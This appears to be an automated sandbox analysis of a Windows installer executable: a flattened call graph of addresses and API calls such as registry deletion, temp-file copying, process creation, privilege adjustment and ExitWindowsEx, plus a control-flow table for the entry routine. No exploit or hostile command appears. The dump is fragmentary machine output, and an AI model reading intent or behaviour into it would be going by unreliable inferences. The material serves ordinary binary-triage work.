701a2c8a 5698->5699 4986 40238e 4987 4023c1 4986->4987 4988 402396 4986->4988 4989 402c41 17 API calls 4987->4989 4990 402c81 17 API calls 4988->4990 4991 4023c8 4989->4991 4992 40239d 4990->4992 4998 402cff 4991->4998 4994 4023a7 4992->4994 4995 4023d5 4992->4995 4996 402c41 17 API calls 4994->4996 4997 4023ae RegDeleteValueW RegCloseKey 4996->4997 4997->4995 4999 402d13 4998->4999 5000 402d0c 4998->5000 4999->5000 5002 402d44 4999->5002 5000->4995 5003 406255 RegOpenKeyExW 5002->5003 5004 402d72 5003->5004 5005 402dec 5004->5005 5009 402d76 5004->5009 5005->5000 5006 402d98 RegEnumKeyW 5007 402daf RegCloseKey 5006->5007 5006->5009 5010 4067c2 5 API calls 5007->5010 5008 402dd0 RegCloseKey 5008->5005 5009->5006 5009->5007 5009->5008 5011 402d44 6 API calls 5009->5011 5012 402dbf 5010->5012 5011->5009 5013 402de0 RegDeleteKeyW 5012->5013 5014 402dc3 5012->5014 5013->5005 5014->5005 5700 701a16d4 5701 701a1703 5700->5701 5702 701a1b5f 22 API calls 5701->5702 5703 701a170a 5702->5703 5704 701a171d 5703->5704 5705 701a1711 5703->5705 5706 701a1727 5704->5706 5707 701a1744 5704->5707 5708 701a1272 2 API calls 5705->5708 5709 701a153d 3 API calls 5706->5709 5710 701a174a 5707->5710 5711 701a176e 5707->5711 5712 701a171b 5708->5712 5714 701a172c 5709->5714 5715 701a15b4 3 API calls 5710->5715 5713 701a153d 3 API calls 5711->5713 5713->5712 5716 701a15b4 3 API calls 5714->5716 5717 701a174f 5715->5717 5718 701a1732 5716->5718 5719 701a1272 2 API calls 5717->5719 5720 701a1272 2 API calls 5718->5720 5721 701a1755 GlobalFree 5719->5721 5722 701a1738 GlobalFree 5720->5722 5721->5712 5723 701a1769 GlobalFree 5721->5723 5722->5712 5723->5712 5724 40190f 5725 402c41 17 API calls 5724->5725 5726 401916 5725->5726 5727 405a4e MessageBoxIndirectW 5726->5727 5728 40191f 5727->5728 5729 40558f 5730 4055b0 GetDlgItem GetDlgItem GetDlgItem 5729->5730 5731 405739 5729->5731 5774 404394 SendMessageW 5730->5774 5733 405742 GetDlgItem CreateThread CloseHandle 5731->5733 5734 40576a 5731->5734 5733->5734 5736 405795 5734->5736 5737 405781 ShowWindow ShowWindow 5734->5737 5738 4057ba 5734->5738 5735 405620 5743 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5735->5743 5740 4057a9 5736->5740 5741 4057cf ShowWindow 5736->5741 5744 4057f5 5736->5744 5776 404394 SendMessageW 5737->5776 5742 4043c6 8 API calls 5738->5742 5745 404338 SendMessageW 5740->5745 5747 4057e1 5741->5747 5748 4057ef 5741->5748 5746 4057c8 5742->5746 5749 405695 5743->5749 5750 405679 SendMessageW SendMessageW 5743->5750 5744->5738 5751 405803 SendMessageW 5744->5751 5745->5738 5755 405450 24 API calls 5747->5755 5756 404338 SendMessageW 5748->5756 5752 4056a8 5749->5752 5753 40569a SendMessageW 5749->5753 5750->5749 5751->5746 5754 40581c CreatePopupMenu 5751->5754 5758 40435f 18 API calls 5752->5758 5753->5752 5757 40640a 17 API calls 5754->5757 5755->5748 5756->5744 5759 40582c AppendMenuW 5757->5759 5760 4056b8 5758->5760 5761 405849 GetWindowRect 5759->5761 5762 40585c TrackPopupMenu 5759->5762 5763 4056c1 ShowWindow 5760->5763 5764 4056f5 GetDlgItem SendMessageW 5760->5764 5761->5762 5762->5746 5765 405877 5762->5765 5766 4056e4 5763->5766 5767 4056d7 ShowWindow 5763->5767 5764->5746 5768 40571c SendMessageW SendMessageW 5764->5768 5769 405893 SendMessageW 5765->5769 5775 404394 SendMessageW 5766->5775 5767->5766 5768->5746 5769->5769 5770 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5769->5770 5772 4058d5 SendMessageW 5770->5772 5772->5772 5773 4058fe GlobalUnlock SetClipboardData CloseClipboard 5772->5773 5773->5746 5774->5735 5775->5764 5776->5736 5777 401491 5778 405450 24 API calls 5777->5778 5779 401498 5778->5779 5787 401d14 5788 402c1f 17 API calls 5787->5788 5789 401d1b 5788->5789 5790 402c1f 17 API calls 5789->5790 5791 401d27 GetDlgItem 5790->5791 5792 402592 5791->5792 5793 404495 lstrcpynW lstrlenW 5794 403a96 5795 403aa1 5794->5795 5796 403aa5 5795->5796 5797 403aa8 GlobalAlloc 5795->5797 5797->5796 5798 402598 5799 4025c7 5798->5799 5800 4025ac 5798->5800 5802 4025fb 5799->5802 5803 4025cc 5799->5803 5801 402c1f 17 API calls 5800->5801 5810 4025b3 5801->5810 5805 402c41 17 API calls 5802->5805 5804 402c41 17 API calls 5803->5804 5806 4025d3 WideCharToMultiByte lstrlenA 5804->5806 5807 402602 lstrlenW 5805->5807 5806->5810 5807->5810 5808 40262f 5809 402645 5808->5809 5811 405f90 WriteFile 5808->5811 5810->5808 5810->5809 5812 405fbf 5 API calls 5810->5812 5811->5809 5812->5808 5813 40451e 5814 404536 5813->5814 5820 404650 5813->5820 5821 40435f 18 API calls 5814->5821 5815 4046ba 5816 404784 5815->5816 5817 4046c4 GetDlgItem 5815->5817 5822 4043c6 8 API calls 5816->5822 5818 404745 5817->5818 5819 4046de 5817->5819 5818->5816 5826 404757 5818->5826 5819->5818 5825 404704 SendMessageW LoadCursorW SetCursor 5819->5825 5820->5815 5820->5816 5823 40468b GetDlgItem SendMessageW 5820->5823 5824 40459d 5821->5824 5837 40477f 5822->5837 5846 404381 EnableWindow 5823->5846 5828 40435f 18 API calls 5824->5828 5847 4047cd 5825->5847 5831 40476d 5826->5831 5832 40475d SendMessageW 5826->5832 5829 4045aa CheckDlgButton 5828->5829 5844 404381 EnableWindow 5829->5844 5836 404773 SendMessageW 5831->5836 5831->5837 5832->5831 5833 4046b5 5838 4047a9 SendMessageW 5833->5838 5836->5837 5838->5815 5839 4045c8 GetDlgItem 5845 404394 SendMessageW 5839->5845 5841 4045de SendMessageW 5842 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5841->5842 5843 4045fb GetSysColor 5841->5843 5842->5837 5843->5842 5844->5839 5845->5841 5846->5833 5850 405a14 ShellExecuteExW 5847->5850 5849 404733 LoadCursorW SetCursor 5849->5818 5850->5849 5851 40149e 5852 4014ac PostQuitMessage 5851->5852 5853 4022f7 5851->5853 5852->5853 5854 401c1f 5855 402c1f 17 API calls 5854->5855 5856 401c26 5855->5856 5857 402c1f 17 API calls 5856->5857 5858 401c33 5857->5858 5859 401c48 5858->5859 5860 402c41 17 API calls 5858->5860 5863 402c41 17 API calls 5859->5863 5866 401c58 5859->5866 5860->5859 5861 401c63 5864 402c1f 17 API calls 5861->5864 5862 401caf 5865 402c41 17 API calls 5862->5865 5863->5866 5867 401c68 5864->5867 5868 401cb4 5865->5868 5866->5861 5866->5862 5869 402c1f 17 API calls 5867->5869 5870 402c41 17 API calls 5868->5870 5871 401c74 5869->5871 5872 401cbd FindWindowExW 5870->5872 5873 401c81 SendMessageTimeoutW 5871->5873 5874 401c9f SendMessageW 5871->5874 5875 401cdf 5872->5875 5873->5875 5874->5875 5876 402aa0 SendMessageW 5877 402ac5 5876->5877 5878 402aba InvalidateRect 5876->5878 5878->5877 5879 402821 5880 402827 5879->5880 5881 402ac5 5880->5881 5882 40282f FindClose 5880->5882 5882->5881 5883 4015a3 5884 402c41 17 API calls 5883->5884 5885 4015aa SetFileAttributesW 5884->5885 5886 4015bc 5885->5886 4544 4034a5 SetErrorMode GetVersion 4545 4034e4 4544->4545 4546 4034ea 4544->4546 4547 4067c2 5 API calls 4545->4547 4548 406752 3 API calls 4546->4548 4547->4546 4549 403500 lstrlenA 4548->4549 4549->4546 4550 403510 4549->4550 4551 4067c2 5 API calls 4550->4551 4552 403517 4551->4552 4553 4067c2 5 API calls 4552->4553 4554 40351e 4553->4554 4555 4067c2 5 API calls 4554->4555 4556 40352a #17 OleInitialize SHGetFileInfoW 4555->4556 4634 4063e8 lstrcpynW 4556->4634 4559 403576 GetCommandLineW 4635 4063e8 lstrcpynW 4559->4635 4561 403588 4562 405cea CharNextW 4561->4562 4563 4035ad CharNextW 4562->4563 4564 4036d7 GetTempPathW 4563->4564 4571 4035c6 4563->4571 4636 403474 4564->4636 4566 4036ef 4567 4036f3 GetWindowsDirectoryW lstrcatW 4566->4567 4568 403749 DeleteFileW 4566->4568 4572 403474 12 API calls 4567->4572 4646 402f30 GetTickCount GetModuleFileNameW 4568->4646 4569 405cea CharNextW 4569->4571 4571->4569 4576 4036c2 4571->4576 4578 4036c0 4571->4578 4574 40370f 4572->4574 4573 40375d 4579 403800 4573->4579 4583 405cea CharNextW 4573->4583 4629 403810 4573->4629 4574->4568 4575 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4574->4575 4577 403474 12 API calls 4575->4577 4732 4063e8 lstrcpynW 4576->4732 4581 403741 4577->4581 4578->4564 4676 403ad8 4579->4676 4581->4568 4581->4629 4600 40377c 4583->4600 4586 40394a 4588 403952 GetCurrentProcess OpenProcessToken 4586->4588 4589 4039ce ExitProcess 4586->4589 4587 40382a 4744 405a4e 4587->4744 4594 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4588->4594 4595 40399e 4588->4595 4591 403840 4598 4059b9 5 API calls 4591->4598 4592 4037da 4597 405dc5 18 API calls 4592->4597 4594->4595 4599 4067c2 5 API calls 4595->4599 4601 4037e6 4597->4601 4602 403845 lstrcatW 4598->4602 4603 4039a5 4599->4603 4600->4591 4600->4592 4601->4629 4733 4063e8 lstrcpynW 4601->4733 4604 403861 lstrcatW lstrcmpiW 4602->4604 4605 403856 lstrcatW 4602->4605 4606 4039ba ExitWindowsEx 4603->4606 4609 4039c7 4603->4609 4608 40387d 4604->4608 4604->4629 4605->4604 4606->4589 4606->4609 4611 403882 4608->4611 4612 403889 4608->4612 4613 40140b 2 API calls 4609->4613 4610 4037f5 4734 4063e8 lstrcpynW 4610->4734 4615 40591f 4 API calls 4611->4615 4616 40599c 2 API calls 4612->4616 4613->4589 4617 403887 4615->4617 4618 40388e SetCurrentDirectoryW 4616->4618 4617->4618 4619 4038a9 4618->4619 4620 40389e 4618->4620 4749 4063e8 lstrcpynW 4619->4749 4748 4063e8 lstrcpynW 4620->4748 4623 40640a 17 API calls 4624 4038e8 DeleteFileW 4623->4624 4625 4038f5 CopyFileW 4624->4625 4631 4038b7 4624->4631 4625->4631 4626 40393e 4627 4061ae 36 API calls 4626->4627 4627->4629 4628 4061ae 36 API calls 4628->4631 4735 4039e6 4629->4735 4630 40640a 17 API calls 4630->4631 4631->4623 4631->4626 4631->4628 4631->4630 4633 403929 CloseHandle 4631->4633 4750 4059d1 CreateProcessW 4631->4750 4633->4631 4634->4559 4635->4561 4637 40667c 5 API calls 4636->4637 4639 403480 4637->4639 4638 40348a 4638->4566 4639->4638 4640 405cbd 3 API calls 4639->4640 4641 403492 4640->4641 4642 40599c 2 API calls 4641->4642 4643 403498 4642->4643 4753 405f0d 4643->4753 4757 405ede GetFileAttributesW CreateFileW 4646->4757 4648 402f73 4675 402f80 4648->4675 4758 4063e8 lstrcpynW 4648->4758 4650 402f96 4651 405d09 2 API calls 4650->4651 4652 402f9c 4651->4652 4759 4063e8 lstrcpynW 4652->4759 4654 402fa7 GetFileSize 4655 4030a8 4654->4655 4659 402fbe 4654->4659 4656 402e8e 32 API calls 4655->4656 4657 4030af 4656->4657 4660 4030eb GlobalAlloc 4657->4660 4657->4675 4761 40345d SetFilePointer 4657->4761 4658 403447 ReadFile 4658->4659 4659->4655 4659->4658 4661 403143 4659->4661 4667 402e8e 32 API calls 4659->4667 4659->4675 4664 403102 4660->4664 4662 402e8e 32 API calls 4661->4662 4662->4675 4668 405f0d 2 API calls 4664->4668 4665 4030cc 4666 403447 ReadFile 4665->4666 4669 4030d7 4666->4669 4667->4659 4670 403113 CreateFileW 4668->4670 4669->4660 4669->4675 4671 40314d 4670->4671 4670->4675 4760 40345d SetFilePointer 4671->4760 4673 40315b 4674 4031d6 44 API calls 4673->4674 4674->4675 4675->4573 4675->4675 4677 4067c2 5 API calls 4676->4677 4678 403aec 4677->4678 4679 403af2 4678->4679 4680 403b04 4678->4680 4770 40632f wsprintfW 4679->4770 4681 4062b6 3 API calls 4680->4681 4682 403b34 4681->4682 4683 403b53 lstrcatW 4682->4683 4685 4062b6 3 API calls 4682->4685 4686 403b02 4683->4686 4685->4683 4762 403dae 4686->4762 4689 405dc5 18 API calls 4691 403b85 4689->4691 4690 403c19 4692 405dc5 18 API calls 4690->4692 4691->4690 4693 4062b6 3 API calls 4691->4693 4694 403c1f 4692->4694 4695 403bb7 4693->4695 4696 403c2f LoadImageW 4694->4696 4699 40640a 17 API calls 4694->4699 4695->4690 4702 403bd8 lstrlenW 4695->4702 4706 405cea CharNextW 4695->4706 4697 403cd5 4696->4697 4698 403c56 RegisterClassW 4696->4698 4701 40140b 2 API calls 4697->4701 4700 403c8c SystemParametersInfoW CreateWindowExW 4698->4700 4731 403cdf 4698->4731 4699->4696 4700->4697 4705 403cdb 4701->4705 4703 403be6 lstrcmpiW 4702->4703 4704 403c0c 4702->4704 4703->4704 4707 403bf6 GetFileAttributesW 4703->4707 4708 405cbd 3 API calls 4704->4708 4711 403dae 18 API calls 4705->4711 4705->4731 4709 403bd5 4706->4709 4710 403c02 4707->4710 4712 403c12 4708->4712 4709->4702 4710->4704 4713 405d09 2 API calls 4710->4713 4714 403cec 4711->4714 4771 4063e8 lstrcpynW 4712->4771 4713->4704 4716 403cf8 ShowWindow 4714->4716 4717 403d7b 4714->4717 4719 406752 3 API calls 4716->4719 4772 405523 OleInitialize 4717->4772 4721 403d10 4719->4721 4720 403d81 4722 403d85 4720->4722 4723 403d9d 4720->4723 4724 403d1e GetClassInfoW 4721->4724 4726 406752 3 API calls 4721->4726 4730 40140b 2 API calls 4722->4730 4722->4731 4725 40140b 2 API calls 4723->4725 4727 403d32 GetClassInfoW RegisterClassW 4724->4727 4728 403d48 DialogBoxParamW 4724->4728 4725->4731 4726->4724 4727->4728 4729 40140b 2 API calls 4728->4729 4729->4731 4730->4731 4731->4629 4732->4578 4733->4610 4734->4579 4736 403a01 4735->4736 4737 4039f7 CloseHandle 4735->4737 4738 403a15 4736->4738 4739 403a0b CloseHandle 4736->4739 4737->4736 4783 403a43 4738->4783 4739->4738 4742 405afa 67 API calls 4743 403819 OleUninitialize 4742->4743 4743->4586 4743->4587 4745 405a63 4744->4745 4746 405a77 MessageBoxIndirectW 4745->4746 4747 403838 ExitProcess 4745->4747 4746->4747 4748->4619 4749->4631 4751 405a10 4750->4751 4752 405a04 CloseHandle 4750->4752 4751->4631 4752->4751 4754 405f1a GetTickCount GetTempFileNameW 4753->4754 4755 405f50 4754->4755 4756 4034a3 4754->4756 4755->4754 4755->4756 4756->4566 4757->4648 4758->4650 4759->4654 4760->4673 4761->4665 4763 403dc2 4762->4763 4779 40632f wsprintfW 4763->4779 4765 403e33 4780 403e67 4765->4780 4767 403b63 4767->4689 4768 403e38 4768->4767 4769 40640a 17 API calls 4768->4769 4769->4768 4770->4686 4771->4690 4773 4043ab SendMessageW 4772->4773 4774 405546 4773->4774 4777 401389 2 API calls 4774->4777 4778 40556d 4774->4778 4775 4043ab SendMessageW 4776 40557f OleUninitialize 4775->4776 4776->4720 4777->4774 4778->4775 4779->4765 4781 40640a 17 API calls 4780->4781 4782 403e75 SetWindowTextW 4781->4782 4782->4768 4784 403a51 4783->4784 4785 403a1a 4784->4785 4786 403a56 FreeLibrary GlobalFree 4784->4786 4785->4742 4786->4785 4786->4786 5887 404ba6 5888 404bd2 5887->5888 5889 404bb6 5887->5889 5890 404c05 5888->5890 5891 404bd8 SHGetPathFromIDListW 5888->5891 5898 405a32 GetDlgItemTextW 5889->5898 5893 404bef SendMessageW 5891->5893 5894 404be8 5891->5894 5893->5890 5896 40140b 2 API calls 5894->5896 5895 404bc3 SendMessageW 5895->5888 5896->5893 5898->5895 5906 701a22fd 5907 701a2367 5906->5907 5908 701a2372 GlobalAlloc 5907->5908 5909 701a2391 5907->5909 5908->5907 5917 4029a8 5918 402c1f 17 API calls 5917->5918 5919 4029ae 5918->5919 5920 4029d5 5919->5920 5921 4029ee 5919->5921 5927 40288b 5919->5927 5924 4029da 5920->5924 5930 4029eb 5920->5930 5922 402a08 5921->5922 5923 4029f8 5921->5923 5926 40640a 17 API calls 5922->5926 5925 402c1f 17 API calls 5923->5925 5931 4063e8 lstrcpynW 5924->5931 5925->5930 5926->5930 5930->5927 5932 40632f wsprintfW 5930->5932 5931->5927 5932->5927 5933 4028ad 5934 402c41 17 API calls 5933->5934 5936 4028bb 5934->5936 5935 4028d1 5938 405eb9 2 API calls 5935->5938 5936->5935 5937 402c41 17 API calls 5936->5937 5937->5935 5939 4028d7 5938->5939 5961 405ede GetFileAttributesW CreateFileW 5939->5961 5941 4028e4 5942 4028f0 GlobalAlloc 5941->5942 5943 402987 5941->5943 5944 402909 5942->5944 5945 40297e CloseHandle 5942->5945 5946 4029a2 5943->5946 5947 40298f DeleteFileW 5943->5947 5962 40345d SetFilePointer 5944->5962 5945->5943 5947->5946 5949 40290f 5950 403447 ReadFile 5949->5950 5951 402918 GlobalAlloc 5950->5951 5952 402928 5951->5952 5953 40295c 5951->5953 5955 4031d6 44 API calls 5952->5955 5954 405f90 WriteFile 5953->5954 5956 402968 GlobalFree 5954->5956 5960 402935 5955->5960 5957 4031d6 44 API calls 5956->5957 5959 40297b 5957->5959 5958 402953 GlobalFree 5958->5953 5959->5945 5960->5958 5961->5941 5962->5949 5970 401a30 5971 402c41 17 API calls 5970->5971 5972 401a39 ExpandEnvironmentStringsW 5971->5972 5973 401a60 5972->5973 5974 401a4d 5972->5974 5974->5973 5975 401a52 lstrcmpW 5974->5975 5975->5973 5066 402032 5067 402044 5066->5067 5068 4020f6 5066->5068 5069 402c41 17 API calls 5067->5069 5071 401423 24 API calls 5068->5071 5070 40204b 5069->5070 5072 402c41 17 API calls 5070->5072 5077 402250 5071->5077 5073 402054 5072->5073 5074 40206a LoadLibraryExW 5073->5074 5075 40205c GetModuleHandleW 5073->5075 5074->5068 5076 40207b 5074->5076 5075->5074 5075->5076 5089 406831 WideCharToMultiByte 5076->5089 5080 4020c5 5082 405450 24 API calls 5080->5082 5081 40208c 5083 402094 5081->5083 5084 4020ab 5081->5084 5086 40209c 5082->5086 5085 401423 24 API calls 5083->5085 5092 701a1777 5084->5092 5085->5086 5086->5077 5087 4020e8 FreeLibrary 5086->5087 5087->5077 5090 40685b GetProcAddress 5089->5090 5091 402086 5089->5091 5090->5091 5091->5080 5091->5081 5093 701a17aa 5092->5093 5134 701a1b5f 5093->5134 5095 701a17b1 5096 701a18d6 5095->5096 5097 701a17c9 5095->5097 5098 701a17c2 5095->5098 5096->5086 5168 701a2394 5097->5168 5184 701a2352 5098->5184 5103 701a180f 5197 701a2569 5103->5197 5104 701a182d 5107 701a187e 5104->5107 5108 701a1833 5104->5108 5105 701a17f8 5119 701a17ee 5105->5119 5194 701a2d37 5105->5194 5106 701a17df 5110 701a17e5 5106->5110 5115 701a17f0 5106->5115 5113 701a2569 10 API calls 5107->5113 5216 701a15c6 5108->5216 5110->5119 5178 701a2aac 5110->5178 5120 701a186f 5113->5120 5114 701a1815 5208 701a15b4 5114->5208 5188 701a2724 5115->5188 5119->5103 5119->5104 5125 701a18c5 5120->5125 5222 701a252c 5120->5222 5122 701a17f6 5122->5119 5123 701a2569 10 API calls 5123->5120 5125->5096 5128 701a18cf GlobalFree 5125->5128 5128->5096 5131 701a18b1 5131->5125 5226 701a153d wsprintfW 5131->5226 5132 701a18aa FreeLibrary 5132->5131 5229 701a121b GlobalAlloc 5134->5229 5136 701a1b83 5230 701a121b GlobalAlloc 5136->5230 5138 701a1da9 GlobalFree GlobalFree GlobalFree 5139 701a1dc6 5138->5139 5155 701a1e10 5138->5155 5140 701a2192 5139->5140 5147 701a1ddb 5139->5147 5139->5155 5142 701a21b4 GetModuleHandleW 5140->5142 5140->5155 5141 701a1c64 GlobalAlloc 5160 701a1b8e 5141->5160 5144 701a21da 5142->5144 5145 701a21c5 LoadLibraryW 5142->5145 5143 701a1ccd GlobalFree 5143->5160 5237 701a161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5144->5237 5145->5144 5145->5155 5146 701a1caf lstrcpyW 5149 701a1cb9 lstrcpyW 5146->5149 5147->5155 5233 701a122c 5147->5233 5149->5160 5150 701a222c 5153 701a2239 lstrlenW 5150->5153 5150->5155 5151 701a20ec 5151->5155 5163 701a2134 lstrcpyW 5151->5163 5238 701a161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5153->5238 5154 701a2064 5236 701a121b GlobalAlloc 5154->5236 5155->5095 5156 701a21ec 5156->5150 5166 701a2216 GetProcAddress 5156->5166 5159 701a2253 5159->5155 5160->5138 5160->5141 5160->5143 5160->5146 5160->5149 5160->5151 5160->5154 5160->5155 5161 701a1d0b 5160->5161 5162 701a1fa5 GlobalFree 5160->5162 5165 701a122c 2 API calls 5160->5165 5161->5160 5231 701a158f GlobalSize GlobalAlloc 5161->5231 5162->5160 5163->5155 5165->5160 5166->5150 5167 701a206d 5167->5095 5176 701a23ac 5168->5176 5170 701a24d5 GlobalFree 5171 701a17cf 5170->5171 5170->5176 5171->5105 5171->5106 5171->5119 5172 701a247f GlobalAlloc CLSIDFromString 5172->5170 5173 701a2454 GlobalAlloc WideCharToMultiByte 5173->5170 5174 701a122c GlobalAlloc lstrcpynW 5174->5176 5175 701a249e 5175->5170 5244 701a26b8 5175->5244 5176->5170 5176->5172 5176->5173 5176->5174 5176->5175 5240 701a12ba 5176->5240 5180 701a2abe 5178->5180 5179 701a2b63 EnumWindows 5183 701a2b81 5179->5183 5180->5179 5182 701a2c4d 5182->5119 5247 701a2a56 5183->5247 5185 701a2367 5184->5185 5186 701a2372 GlobalAlloc 5185->5186 5187 701a17c8 5185->5187 5186->5185 5187->5097 5192 701a2754 5188->5192 5189 701a27ef GlobalAlloc 5193 701a2812 5189->5193 5190 701a2802 5191 701a2808 GlobalSize 5190->5191 5190->5193 5191->5193 5192->5189 5192->5190 5193->5122 5195 701a2d42 5194->5195 5196 701a2d82 GlobalFree 5195->5196 5251 701a121b GlobalAlloc 5197->5251 5199 701a260e StringFromGUID2 5203 701a2573 5199->5203 5200 701a261f lstrcpynW 5200->5203 5201 701a25ec MultiByteToWideChar 5201->5203 5202 701a2632 wsprintfW 5202->5203 5203->5199 5203->5200 5203->5201 5203->5202 5204 701a2656 GlobalFree 5203->5204 5205 701a268b GlobalFree 5203->5205 5206 701a1272 2 API calls 5203->5206 5252 701a12e1 5203->5252 5204->5203 5205->5114 5206->5203 5256 701a121b GlobalAlloc 5208->5256 5210 701a15b9 5211 701a15c6 2 API calls 5210->5211 5212 701a15c3 5211->5212 5213 701a1272 5212->5213 5214 701a127b GlobalAlloc lstrcpynW 5213->5214 5215 701a12b5 GlobalFree 5213->5215 5214->5215 5215->5120 5217 701a15ff lstrcpyW 5216->5217 5218 701a15d2 wsprintfW 5216->5218 5221 701a1618 5217->5221 5218->5221 5221->5123 5223 701a253a 5222->5223 5224 701a1891 5222->5224 5223->5224 5225 701a2556 GlobalFree 5223->5225 5224->5131 5224->5132 5225->5223 5227 701a1272 2 API calls 5226->5227 5228 701a155e 5227->5228 5228->5125 5229->5136 5230->5160 5232 701a15ad 5231->5232 5232->5161 5239 701a121b GlobalAlloc 5233->5239 5235 701a123b lstrcpynW 5235->5155 5236->5167 5237->5156 5238->5159 5239->5235 5241 701a12c1 5240->5241 5242 701a122c 2 API calls 5241->5242 5243 701a12df 5242->5243 5243->5176 5245 701a271c 5244->5245 5246 701a26c6 VirtualAlloc 5244->5246 5245->5175 5246->5245 5248 701a2a61 5247->5248 5249 701a2a71 5248->5249 5250 701a2a66 GetLastError 5248->5250 5249->5182 5250->5249 5251->5203 5253 701a12ea 5252->5253 5254 701a130c 5252->5254 5253->5254 5255 701a12f0 lstrcpyW 5253->5255 5254->5203 5255->5254 5256->5210 5981 402a35 5982 402c1f 17 API calls 5981->5982 5983 402a3b 5982->5983 5984 402a72 5983->5984 5986 40288b 5983->5986 5987 402a4d 5983->5987 5985 40640a 17 API calls 5984->5985 5984->5986 5985->5986 5987->5986 5989 40632f wsprintfW 5987->5989 5989->5986 5990 401735 5991 402c41 17 API calls 5990->5991 5992 40173c SearchPathW 5991->5992 5993 4029e6 5992->5993 5994 401757 5992->5994 5994->5993 5996 4063e8 lstrcpynW 5994->5996 5996->5993 5997 701a166d 5998 701a1516 GlobalFree 5997->5998 6001 701a1685 5998->6001 5999 701a16cb GlobalFree 6000 701a16a0 6000->5999 6001->5999 6001->6000 6002 701a16b7 VirtualFree 6001->6002 6002->5999 6003 4014b8 6004 4014be 6003->6004 6005 401389 2 API calls 6004->6005 6006 4014c6 6005->6006 6007 401db9 GetDC 6008 402c1f 17 API calls 6007->6008 6009 401dcb GetDeviceCaps MulDiv ReleaseDC 6008->6009 6010 402c1f 17 API calls 6009->6010 6011 401dfc 6010->6011 6012 40640a 17 API calls 6011->6012 6013 401e39 CreateFontIndirectW 6012->6013 6014 402592 6013->6014 6015 40283b 6016 402843 6015->6016 6017 402847 FindNextFileW 6016->6017 6018 402859 6016->6018 6017->6018 6019 4029e6 6018->6019 6021 4063e8 lstrcpynW 6018->6021 6021->6019 6022 701a10e1 6024 701a1111 6022->6024 6023 701a11d8 GlobalFree 6024->6023 6025 701a12ba 2 API calls 6024->6025 6026 701a11d3 6024->6026 6027 701a1272 2 API calls 6024->6027 6028 701a1164 GlobalAlloc 6024->6028 6029 701a11f8 GlobalFree 6024->6029 6030 701a11c4 GlobalFree 6024->6030 6031 701a12e1 lstrcpyW 6024->6031 6025->6024 6026->6023 6027->6030 6028->6024 6029->6024 6030->6024 6031->6024

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 7 4034ee 1->7 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 7->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 30 4035d5-4035d9 28->30 31 4035ce-4035d3 28->31 38 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->38 39 403749-403763 DeleteFileW call 402f30 29->39 33 4035e0-4035e4 30->33 34 4035db-4035df 30->34 31->30 31->31 36 4036a3-4036b0 call 405cea 33->36 37 4035ea-4035f0 33->37 34->33 54 4036b2-4036b3 36->54 55 4036b4-4036ba 36->55 42 4035f2-4035fa 37->42 43 40360b-403644 37->43 38->39 53 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 38->53 56 403814-403824 call 4039e6 OleUninitialize 39->56 57 403769-40376f 39->57 47 403601 42->47 48 4035fc-4035ff 42->48 49 403661-40369b 43->49 50 403646-40364b 43->50 47->43 48->43 48->47 49->36 52 40369d-4036a1 49->52 50->49 58 40364d-403655 50->58 52->36 59 4036c2-4036d0 call 4063e8 52->59 53->39 53->56 54->55 55->28 61 4036c0 55->61 75 40394a-403950 56->75 76 40382a-40383a call 405a4e ExitProcess 56->76 62 403804-40380b call 403ad8 57->62 63 403775-403780 call 405cea 57->63 65 403657-40365a 58->65 66 40365c 58->66 68 4036d5 59->68 61->68 74 403810 62->74 79 403782-4037b7 63->79 80 4037ce-4037d8 63->80 65->49 65->66 66->49 68->29 74->56 77 403952-403968 GetCurrentProcess OpenProcessToken 75->77 78 4039ce-4039d6 75->78 85 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 77->85 86 40399e-4039ac call 4067c2 77->86 88 4039d8 78->88 89 4039dc-4039e0 ExitProcess 78->89 87 4037b9-4037bd 79->87 82 403840-403854 call 4059b9 lstrcatW 80->82 83 4037da-4037e8 call 405dc5 80->83 100 403861-40387b lstrcatW lstrcmpiW 82->100 101 403856-40385c lstrcatW 82->101 83->56 99 4037ea-403800 call 4063e8 * 2 83->99 85->86 102 4039ba-4039c5 ExitWindowsEx 86->102 103 4039ae-4039b8 86->103 93 4037c6-4037ca 87->93 94 4037bf-4037c4 87->94 88->89 93->87 98 4037cc 93->98 94->93 94->98 98->80 99->62 100->56 105 40387d-403880 100->105 101->100 102->78 106 4039c7-4039c9 call 40140b 102->106 103->102 103->106 108 403882-403887 call 40591f 105->108 109 403889 call 40599c 105->109 106->78 117 40388e-40389c SetCurrentDirectoryW 108->117 109->117 118 4038a9-4038d2 call 4063e8 117->118 119 40389e-4038a4 call 4063e8 117->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 129 40393e-403945 call 4061ae 126->129 127->126 128 403907-403927 call 4061ae call 40640a call 4059d1 127->128 128->126 138 403929-403930 CloseHandle 128->138 129->56 138->126
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                              • GetVersion.KERNEL32 ref: 004034CE
                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403545
